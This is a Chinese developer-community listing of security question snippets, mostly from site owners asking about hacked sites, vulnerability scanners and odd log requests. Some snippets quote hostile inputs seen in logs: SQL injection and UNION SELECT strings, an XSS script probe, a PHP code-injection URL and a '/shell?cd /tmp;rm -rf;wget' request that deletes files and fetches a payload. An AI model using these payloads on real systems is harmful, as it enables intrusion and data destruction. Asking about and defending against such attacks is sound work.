腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
视频
沙龙
3
回答
一个网站如何从代码注入中恢复,特别是域名?
、
、
、
、
我的网站最近被黑客入侵,显然它是代码注入漏洞,而不是SQL注入。至少这是Google告诉我的,甚至给了我一个可能的iframe代码。这对我来说是个打击,因为我的网站从来没有发生过这种情况。我发现最近我正在我的webserver上测试upload php脚本,然后忘了删除它。所以我知道他们是怎么进来的。因此,我继续记录所有我看到的不属于服务器的东西,包括upload php脚本。另外,我在.htaccess文件中看到了一些有用的东西。我没有检查代码,而是从服务器上完全删除了它。 不管怎样,我试着尽我所能,就像人们在网上建议的那样。尽管如此,黑客并没有完全消失,也没有完全消失。所以,我认为够了就够
浏览 0
提问于2012-07-30
得票数 -1
回答已采纳
2
回答
Nessus是否批准了PCI扫描?
、
题目在题目里。我似乎找不到一个直截了当的答案,泰伯似乎在他们的网站上回避一个“是/否”的答案。几年前,有人告诉我,Qualys是由PCI批准的PCI遵从性,而Nessus当时没有。这一切都变了吗?
浏览 0
提问于2016-08-11
得票数 0
回答已采纳
1
回答
PHP项目的全合一漏洞扫描器?
、
、
、
我在不正确的子站点(security.se)上问过这个问题,但是我认为这个问题更适合这个网站。所以,我在搜索一个工具,其中包括多个漏洞扫描器,这样我们就可以上传一个项目(甚至提交我们的网站),并且这个工具扫描我们的站点(或项目)是否存在漏洞。但区别在于,它使用多个不同的扫描仪(如VirusTotal)进行扫描。 我自己做了一个想法的草图,来展示我的意思:http://allscanners.itask.software/ 当我们需要这样的东西时,我们该怎么办?
浏览 0
提问于2019-01-15
得票数 0
1
回答
如何信任在互联网上找到的javascript开源库
、
、
实际上,我需要使用一些在互联网上找到的JS库或包。但出于安全原因,我对使用它们持怀疑态度。 例如,在github中找到的JS simplebar。它很酷,节省了很多时间,但是我怎么能相信它呢?里面有恶意软件吗? 有没有列出信任库的网站? 谢谢你的建议
浏览 1
提问于2019-09-18
得票数 0
2
回答
HTTP请求hijkacked?
、
、
我在我的第一个新VPS上安装了Tomcat 6。我已经将AccessLogValve添加到server.xml配置Tomcat文件中。在tomcat日志中,我首先看到了这一点: xxx.xxx.xxx.xxx - - [04/Mar/2011:23:43:12 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 - "-" "-" 第二天,我去了这个网站(在互联网浏览器中),tomcat日志中的一个请求具有与上述记录相同的IP,但具有像我这样的用户代理头(以及会话cookies -这是我
浏览 0
提问于2011-03-05
得票数 0
1
回答
什么是最好的方式来执行渗透测试免费和不带软件?
、
、
是否有任何软件或硬件可以在没有付费订阅的情况下执行渗透测试?例如,免费使用,如Kali-linux等。我想学习如何执行渗透测试。如果有任何网站或指南,您的建议,我将不胜感激。 我想在无线路由器和服务器(如Windows、Mac和Linux设备)上进行渗透测试。 有没有可能从安卓,iOS,Linux,黑莓设备上下载? 谢谢。
浏览 0
提问于2016-02-28
得票数 1
2
回答
有什么程序我可以用来测试我的网站被黑客攻击吗?
、
可能重复: 检查常见漏洞的工具? 是否有任何应用程序可以对我的网站进行随机查询,并试图在其中发现漏洞?我特别关心的是sql注入?
浏览 0
提问于2011-10-30
得票数 0
2
回答
PHP安全漏洞的渗透测试
、
、
、
我正在做一篇关于“识别和测试网站安全漏洞”的本科生研究论文。最初,我认为我应该手动测试,因为我在我的方法中指定,我只测试几个选定的漏洞,即SQL注入,跨站脚本,错误报告,会话劫持和输入验证。但当我继续研究时,我发现所有的文章和教程都建议使用软件。 我有几个我的伙伴管理的网站,所以我想在他们的网站上进行测试。我正在检查半打网站上的一些漏洞。我应该使用渗透测试工具,还是只做动态渗透测试而不使用软件?
浏览 2
提问于2015-05-25
得票数 2
回答已采纳
1
回答
如何解决连续的wordpress重定向和注入黑客问题?
、
、
、
我的主机多个wordpress站点都遇到了安全问题。所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,上周,他们中的一些人受到以下因素的影响: 将流量重定向到显示文件系统中奇怪/损坏文件的垃圾邮件,包括添加到.php文件(编码头)中的额外文件和内容--我们的云提供商发出了滥用警报:一家大银行联系了他们,称我们的IP地址被用来进行钓鱼攻击。服务器在PHP进程(非常高的负载、CPU和内存使用)方面运行得很高。 对此,我有: 一个月前,FilesChecked 从备份中复制了SQL和Wordpress文件,用官方的Wordpress 替换了整
浏览 6
提问于2020-04-20
得票数 0
1
回答
Apache服务器安全和cPanel扫描?
、
、
、
、
有没有办法(或一个cPanel插件),可以不断扫描网站的漏洞/恶意软件/漏洞从WHM或cPanel?
浏览 1
提问于2013-03-29
得票数 0
1
回答
为什么机器人访问我的网站,即使它还没有与任何人分享?
、
这很平常吗?这些机器人每15分钟就会访问我的网站,他们是我唯一的访客,因为我还没有和任何人分享过这个网站.他们怎么知道我的网站的? 这样做的目的是什么,他们是想从我的网页上刮掉信息还是别的什么?这是隐私问题吗?
浏览 0
提问于2020-10-30
得票数 1
6
回答
怎样才能免费检查网站安全?
、
我听说有一些免费的应用程序可以检查PHP网站的漏洞,但我不知道该用什么。我想要一个Windows的免费程序(最好有一个GUI),它将分析我的网站,并给我一个报告。 有人知道解决方案吗?
浏览 2
提问于2008-12-04
得票数 37
回答已采纳
1
回答
注释框中的问题
注释框上的“回复”选项不起作用。请让我知道怎么做好吗? 注意:我可以回复来自行政区域的评论(wp->注释->.)但网站访问者无法回复。 例如,请检查以下内容:www.linuxstall.com/linux-command-line-tips-that-every-linux-user-should-know/ 点击“回复”那里。您将无法回复该评论。您可以添加新的评论,但“回复”将无法工作。 让我知道如何解决这个问题。谢谢。
浏览 0
提问于2012-02-11
得票数 0
回答已采纳
1
回答
网络漏洞扫描器是主动的还是被动的?
、
我想扫描我自己的网站的漏洞使用Vega和w3af从卡利linux。我假设这些工具执行主动攻击,而不是被动攻击。这是正确的吗? 如果它们确实对站点执行主动攻击以查找漏洞,那么有效负载是否是恶意的?在检查SQL注入时,我会伤害数据库吗?
浏览 0
提问于2014-07-25
得票数 0
回答已采纳
7
回答
在一个特定的网站上使用google呆子?
、
、
我需要看看我正在测试的网站是否容易受到这和这等网站上的多个谷歌呆子的攻击。传统上,人们通过搜索Google中的"Index of /“+c99.php”来使用'dork‘,并获得一堆结果。 我如何能够搜索所有的书呆子为我的具体网站迅速和容易?有可能吗? 编辑:为了澄清,我可以访问,并使用一些商业付费应用程序做网页应用程序扫描。然而,我有问题的网站使用WAF和限制我的连接,这大大减慢了事情。因此,我更多的是寻找一个查询谷歌的程序,而不是扫描网站。
浏览 0
提问于2013-10-07
得票数 14
回答已采纳
1
回答
什么样的攻击是我的网站可替代的,我如何防止它们?
、
我正在开发一个使用这个书的网站。根据我的知识和这本书,我必须注意的主要问题是XSS、CRSF和SQL注入攻击。我发现有足够的资源,插件和解决方案可以防止这些攻击。有没有其他可能伤害我的网站的攻击/其他危险? 我正在使用IIS10运行一个ASP.NET CoreMVC1.0网站。
浏览 0
提问于2017-12-18
得票数 0
回答已采纳
5
回答
通过url进行PHP攻击
、
、
、
我的网站最近遭到攻击,在日志中我发现了一些请求,比如: 我在我的根目录中发现了一些可疑的文件和文件夹,有人在主页上写到“你被黑了”。 其中一个文件夹是"lentenfish“,它有"sql.php”、"cof.pl“、".htaccess”、"jen.jeen“等文件。 mysite.com/view_news.php?id=-999.9联合所有选择0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x3130323534
浏览 5
提问于2011-05-09
得票数 2
回答已采纳
10
回答
渗透试验
、
、
我们正在部署一个新的网站,我们自己托管。除了进入白帽之外,你将如何从网络之外进行渗透测试?
浏览 0
提问于2009-05-27
得票数 11
回答已采纳
1
回答
恶意软件扫描网站代码?
、
、
、
、
我有多个使用工具扫描的Linux CentOS服务器,当它在我的服务器上发现一些恶意代码(共享/专用)时,这些站点的排名就会下降。 我正在寻找的是一个服务器扫描仪,扫描.php,.js文件和类似的恶意软件代码,这样我就可以在谷歌降低该网站排名之前做出反应。 我已经找到了一个php恶意软件扫描仪(nbs-system/ PHP -恶意软件-查找器:检测潜在的恶意PHP文件),还在努力使它工作,但我想找到一个更完整的解决方案,以提高我的服务器的安全性。 有服务器/网站特定的恶意软件扫描器吗? 注意:不是寻找成熟的杀毒产品,而是寻找一种,最好是开源的,扫描网页代码的恶意软件扫描仪,而不是.exe,.
浏览 0
提问于2016-05-17
得票数 6
回答已采纳
3
回答
PHP sql安全性
、
、
我在我的变量上使用了mysql_real_escape_string(),但在查看我的日志时,我注意到来自某人的输入流,其中的条目如下: ${@print(md5(acunetix_wvs_security_test))} 1\" or (sleep(4)+1) limit 1 -- 诸若此类。一大堆人的名单。 他是不是在尝试什么都没发生?或者仅仅使用mysql_real_escape_string()我的代码不安全? 编辑:我看不到任何损坏,但网站上的大多数输入区都被多次尝试过。如果它一次都不起作用,意识到它是安全的,他不会停下来吗?
浏览 2
提问于2013-01-27
得票数 4
2
回答
已取消的DNS仍然导致X.509证书主题CN与实体名称不匹配
、
、
、
我在一个不再解析的DNS上运行了一次N曝露扫描,发现了一个漏洞: X.509证书主题CN与实体名称不匹配 我不知道为什么它仍然产生一个漏洞,而DNS甚至不应该解决。 我该怎么解决这个问题?
浏览 0
提问于2022-12-03
得票数 0
1
回答
在前提条件下使用在线/云应用程序扫描器的危险或缺点是什么?
、
、
如今,云扫描仪变得越来越普遍。价格比前提扫描器便宜得多。我对云扫描仪的关注是,它们在第三方网络上存储敏感信息。(我不确定敏感信息是否只包括扫描结果)。除了扫描结果外,还有其他信息可以存储吗?我知道,当我参加网络法和合规课程时,我记得其中一些课程(HIPPA、SOX、PCI)要求将个人信息传输到另一个网站。在使用Cloud应用程序扫描仪时,无论是SAST还是DAST,我是否应该关注这个问题?你对云扫描仪和前提扫描仪有什么经验和想法?
浏览 0
提问于2014-09-04
得票数 0
回答已采纳
9
回答
检查常见漏洞的工具?
是否有任何好的工具(桌面或在线)允许您检查您的网站是否存在常见的漏洞(例如SQL注入、XSS)?
浏览 0
提问于2010-07-08
得票数 35
回答已采纳
1
回答
我应该遵循哪些最佳实践来保护我的windows server 2016 web server?
、
我有一个专用的服务器窗口服务器2016、IIS、Sql server 2018企业版和MS SQL server数据库。我使用这个服务器来托管我的dotnet核心应用程序,我通过远程桌面管理这个服务器。托管网站在服务器上安装了SSl证书。我想知道我应该应用的最佳实践是什么,以确保我的服务器以及我的托管web应用程序及其连接的SQL数据库的完全安全。此外,我还想知道是否有可信的工具可以测量我的服务器、web应用程序和SQL数据库的安全级别。 提前感谢
浏览 0
提问于2020-02-04
得票数 1
1
回答
ASP.Net网站的自动化测试工具
、
有没有人知道免费的自动测试工具来测试asp.net网站的安全性、连接池等,我用了netsparker社区版,但功能非常有限。
浏览 1
提问于2011-12-07
得票数 1
回答已采纳
1
回答
ASP.NET -我的简单W3学校的CrosSite脚本检查的真正需求-就像你自己尝试一下
、
、
我正在用ASP.NET建立一个网站,我想给它的用户提供一个测试他们的html5/css/javascript代码的机会。 为了达到这个目的,我实现了一个类似于W3School的Try It Yourself编辑器。 这个编辑器通过POST将当前页面上的文本区域的代码提交到文本区域旁边可视化为iframe的TryIt.aspx页面。 TryIt.aspx背后的代码如下所示 protected void Page_Load(object sender, EventArgs e) { RunScriptCode(); } pr
浏览 0
提问于2013-11-06
得票数 1
1
回答
添加了site.xml和/good目录
、
、
、
、
我在做一个被黑的wordpress网站。乍一看,我看到了一个site.xml文件和一个/good目录,放在网站的根目录上。 site.xml包含以下头字符串: <urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
浏览 0
提问于2015-06-04
得票数 0
回答已采纳
2
回答
对我的服务器的奇怪请求
、
最近,我检查了日志,发现了一些对服务器的奇怪请求。例如 GET /path/Microsoft.XMLHTTP HTTP/1.0 GET /path2/Scripting.FileSystemObject HTTP/1.0 进一步的检查似乎指向了某个机器人在做网站存档。一个网络档案机器人会以命令的形式执行这样的请求来存档我们的站点吗? 例如,如果来自互联网档案馆或某个库进行归档,这些归档机器人实际上会执行这样的请求吗?我想他们只是在搜索或者抓取整个网站,而不是调用这样的命令。 更新: 经过进一步的调查,我发现存档机器人可能深入分析了页面上的javascript,并抓住了包含Scripting.
浏览 0
提问于2015-10-23
得票数 2
回答已采纳
6
回答
关闭XSS漏洞
、
我在我的网站上运行了一个漏洞扫描器,它显示了几个漏洞,如下所示: http://.../search?text=&ClassIDNames[37]=<script>alert('Found')</script>&ActiveFacet[ClassID]=37 但是,当将url复制到浏览器时,它不会给我警报输出,而是给出相应输入的搜索结果。这是我要修的东西还是没什么好担心的?或者我还需要做些什么来复制它呢?
浏览 0
提问于2015-06-17
得票数 3
回答已采纳
2
回答
ASP.NET MVC中的漏洞测试
、
、
我参与了基于ASP.NET MVC和ASP.NET WebAPI的基于测试的开发,使用NMock单元测试,但是我编写的大多数单元测试都围绕着测试功能。 从单元测试的角度看 : 是否有任何框架来测试控制器(或任何其他组件)上的访问点操作的漏洞。 从自动化/手动QA测试的角度来看 是否有任何(更喜欢开源的)工具来测试建立在ASP.NET MVC、手动或自动基础上的网站的漏洞,这些漏洞可以用于质量保证?
浏览 4
提问于2013-05-12
得票数 9
3
回答
如何检查我的服务器和magento站点是否符合PCI
、
是否有任何工具可以检查站点和服务器的PCI合规性。 此外,这将是伟大的,如果我知道我可以让我的服务器和magento网站PCI合规性。 谢谢
浏览 0
提问于2016-07-31
得票数 1
1
回答
这些要求是什么?
、
、
我正在检查我的服务器的web服务器日志,我正在安装一个wordpress网站,并发现所有这些请求,该网站是新的! 我该担心吗?我的网站被黑了还是怎么了?我一点也不明白。将我的网站改为"ooooo.com“ 2022/07/18 19:51:07 [error] 27501#27501: *3184 access forbidden by rule, client: 172.70.147.9, server: oooooo.com, request: "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/2.0
浏览 0
提问于2022-07-18
得票数 0
回答已采纳
2
回答
从表单输入在我的网站上运行PHP命令
、
我今天在我的网站上发现了一些文件被创建、删除和编辑。我不知道是怎么做到的。但我知道这可以通过一些PHP函数来完成,比如: mkdir('Folder'); file_put_contents();scandir();... 但是,这些代码只有在我用PHP代码编写时才会执行。 如何从$_GET值运行这些命令 示例PHP,它显示来自URL的?name查询。 可以在里面注入代码并黑进我的网站吗? 就像https://example.com?name=".mkdir("Hacked")." 如果是的话,那我怎么才能防止这些错误和黑客呢?
浏览 0
提问于2022-08-03
得票数 0
6
回答
测试黑客的企图
、
、
、
我想确保我的网站被保护免受黑客攻击,我认为最好的测试方式是尝试和黑我自己的网站。黑客会做什么样的事情来攻击我的网站呢? 例如, Test -他们可以将javascript放在输入字段中,例如 <“open javascript tag">window.location = “www.somewhereelse.com”;<“end javascript tag”> 保护-在显示数据之前使用php实体函数。 为了确保我的网站是安全的,我还能用什么东西来测试呢?
浏览 3
提问于2011-06-06
得票数 5
回答已采纳
1
回答
安全性: wordpress外部的关键后端
、
首先,为我对网络开发的惨痛知识表示歉意。 我一直在为我的创业开发一个简单的网站,并遇到了一些安全问题。了解我有限的知识以及与wordpress和人为错误相关的所有可能的漏洞,我想在外部服务器/服务上实现简单的后端操作。 这将是理想的,因为我的增值公司将在我的数据库和算法处理它。因此,我希望我能将这些问题与任何与wordpress相关的问题脱钩。 对于如何尽可能安全地实现这一点,我有什么想法/建议,或者我可能遇到的任何问题? (谢谢;)
浏览 0
提问于2019-01-31
得票数 0
3
回答
SQL注入受损的网站?
、
这可能听起来像是一个奇怪的问题,但是有没有什么地方可以下载一个易受sql注入攻击的网站,这种url不能绕过登录? 我正在制作一个漏洞扫描器,我想学习一些SQLi,这样我就可以将它包含在我的项目中。 谢谢,它不需要花哨。就足够练习了。
浏览 0
提问于2010-09-05
得票数 1
回答已采纳
2
回答
这是哪种类型的黑客攻击?从不存在的URL访问不存在的shell文件
、
、
、
我在我的网站上使用Wordpress,最近我拦截了一个黑客,他通过很多后门(字面上是成千上万的后门)感染了我的网站。我花了一个半月和他打赌。这不是我的错,在我之前工作的那个人从来没有更新过这个网站。 在这之后,我注意到一些奇怪的访问不存在的文件,我认为黑客试图从我不使用的wordpress插件中寻找已知的漏洞。没关系,我一点也不关心。但其中一次尝试引起了我的注意。 95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http
浏览 60
提问于2020-01-18
得票数 4
5
回答
Web服务器攻击方法:如果漏洞扫描器完成了所有工作,为什么还要手工测试呢?
我在读一本来自著名证书的白帽黑客书。他们说,黑客攻击web服务器的方法是: 信息收集(域名、DNS、IP等) 脚印(例如:抓横幅) 网站镜像 漏洞扫描 会话劫持 密码破解 除了会话劫持和信息收集之外,我不明白为什么我不会仅仅推出和/或Nessus来查找所有的弱点。 如果您可以自动执行手动测试,这有什么意义呢? 例如,如果漏洞扫描器不知道如何查找易受攻击的cookie,如果我手动找到一种方法来执行会话劫持,我将无法为此对Nessus的Acunetix进行培训。即使我这么做了,我也不知道这会有多大好处。 请解释我为什么不让我的工具为我做黑客。
浏览 0
提问于2020-02-29
得票数 31
1
回答
PHPSecurityScanner和SpikePHPSecAudit -如何实现?
、
如何运行PHP Security Scanner和SpikePHPSecAudit? 我已经将它们提取到我的网站的根目录中,并认为它可以像phpSecInfo一样运行,您只需导航到 www.mySite.com/phpsecinfo/index.php 任何帮助都将不胜感激。 ps我使用的是Windows XP和XAMPP
浏览 1
提问于2010-05-27
得票数 1
回答已采纳
1
回答
我们可以对通过IBM Cloud(Bluemix)中的门户上载的文件执行病毒扫描吗
、
、
、
我们是否可以对通过IBM Cloud(Bluemix)中的门户网站上传的文件进行病毒扫描。如果是这样的话,Docker或任何其他组件都会提供一个功能。 Devops团队不能找出任何可以帮助扫描的可用的解决方案/功能,是否可以通过代码进行扫描,或者如果我们可以在云中进行扫描,那么方法会是什么。
浏览 8
提问于2019-11-13
得票数 0
3
回答
请问网站的SQL注入漏洞能扫描得到吗?
、
、
、
、
请描述您的问题 [附加信息]
浏览 500
提问于2019-11-28
回答已采纳
2
回答
我想测试我的网站,你推荐什么工具?
、
我已经下载了我的网站/数据库,并在Centos 7服务器本地重新创建它。我想给它一个很好的锤击,以便找到和修复任何漏洞。有人能推荐一款能帮我完成这个功能的软件吗?开源就太棒了!
浏览 0
提问于2016-09-27
得票数 -5
1
回答
“看门狗”报告说,许多垃圾邮件查找页面没有找到警告。
、
定期地,我喜欢运行下面的命令,看看什么样的活动和错误正在与我们的网站进行实时。 drush ws --tail --full 每一秒左右,都有一个页面没有找到错误,但这些页面与我们网站的内容完全无关,遵循我们的Drupal格式。我们的网站已经迁移了几次,可能有很久以前的旧内容,但同样,这些内容与我们的主题材料没有任何关系。有没有人知道会发生什么或者这是否正常? 如何阻止命令运行? 谢谢!
浏览 0
提问于2016-10-27
得票数 0
回答已采纳
2
回答
用于检查跨站点脚本的.NET代码分析工具
、
我知道微软提供了一个工具,告诉你关于coss网站,脚本攻击等。该工具是 但是,有没有你用过的.NET应用程序的类似工具,哪一个在ASP .Net应用程序中被广泛使用?
浏览 0
提问于2010-05-15
得票数 2
回答已采纳
1
回答
在/408.shtml站点上请求的不存在的/403.shtml和WordPress URL
、
、
、
在我的WordPress网站上,最常见的两个不存在的页面如下: /408.shtml (3500次) /403.shtml (470次) 我使用重定向插件跟踪404个请求,这些是最常见的请求,第二个最常见的请求仅被请求50次。 为什么要请求这些页面?我推测这些是仅基于URL的HTTP错误代码,但我从未见过由我的网站返回的403或408 HTTP错误。如果这些HTTP错误被返回,这些页面会被请求,还是站点只返回一个空白页和错误代码? 有趣的是,绝大多数/408.shtml请求来自同一个用户代理,"Mozilla/5.0 (WindowsNT6.1;WOW64;rv:40.0) Gecko
浏览 0
提问于2019-04-02
得票数 1
回答已采纳
1
回答
CloudFlare是否可以保护底层操作系统和web服务器免受漏洞攻击?
我知道CloudFlare可以保护您的应用程序免受SQL和XSS注入等攻击。但是操作系统和web服务器呢? 例如,如果我的网站托管在IIS/Windows上,CloudFlare是否也可以保护我的服务器免受操作系统漏洞和/或IIS漏洞的攻击?
浏览 2
提问于2015-12-29
得票数 0
1
回答
增强CentOS 6 web服务器安全性
、
、
云中有一个作为虚拟机安装的web服务器。我自己配置了它,它有两个公司网站。我不打算再去那里了。因此,在公开之前,我想检查一下它是否存在安全漏洞。请指导我的最佳实践,清单和审计程序,任何衡量和评估服务器的安全性。
浏览 0
提问于2013-07-03
得票数 0
回答已采纳
1
回答
安全admin :更改管理
如果这是个非常愚蠢的问题,我很抱歉。 我一直在寻找如何确保我的WP和许多网站建议创建一个新的管理用户帐户和删除旧的方法。现在,如果我用一个不同的剧本作为作者(当我写评论等)-黑客怎么还能发现我的管理员用户名是什么呢? 我只是想知道这个步骤是否真的有意义,除非您的管理员用户名是"admin“。 非常感谢你的澄清。
浏览 0
提问于2011-11-12
得票数 0
回答已采纳
2
回答
雇佣保安auditors...what我应该知道吗?
我想雇一个人对我的网站做一个安全审计,但我不知道如何去做。哪里是寻找审计师的好地方?除了推荐名单外,我应该在审计师中寻找什么?他/他们应该具备哪些资格,我如何核实他们?
浏览 0
提问于2011-12-15
得票数 6
1
回答
我在日志里看到了一个奇怪的网址,不知道该怎么做
我绝对不是安全专家。我拥有一个非常小的个人网站,我主要是为了练习而用php编写的。 我注意到日志里有个奇怪的url电话 process.php?d=MV0f+F6R+6Nn/B4VDh1FRJ9fSEjpPw==&b=1 我试着自己跟踪那个url,但它除了404之外什么也不去。 我不想从轨道上核爆我的网站。至少我可以采取哪些步骤来确定是否真的发生了任何事情。 这个网站是用symfony 4写的(不管它值多少钱)。
浏览 0
提问于2019-09-26
得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
网站漏洞扫描修复php代码详情
黑客安全篇:AWVS网站漏洞扫描技巧
网站渗透测试对某cms代码的漏洞分析扫描
网站漏洞扫描工具AWVS下载安装和简单使用教程
WEB漏洞扫描原理
热门
标签
更多标签
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
活动推荐
运营活动
广告
关闭
领券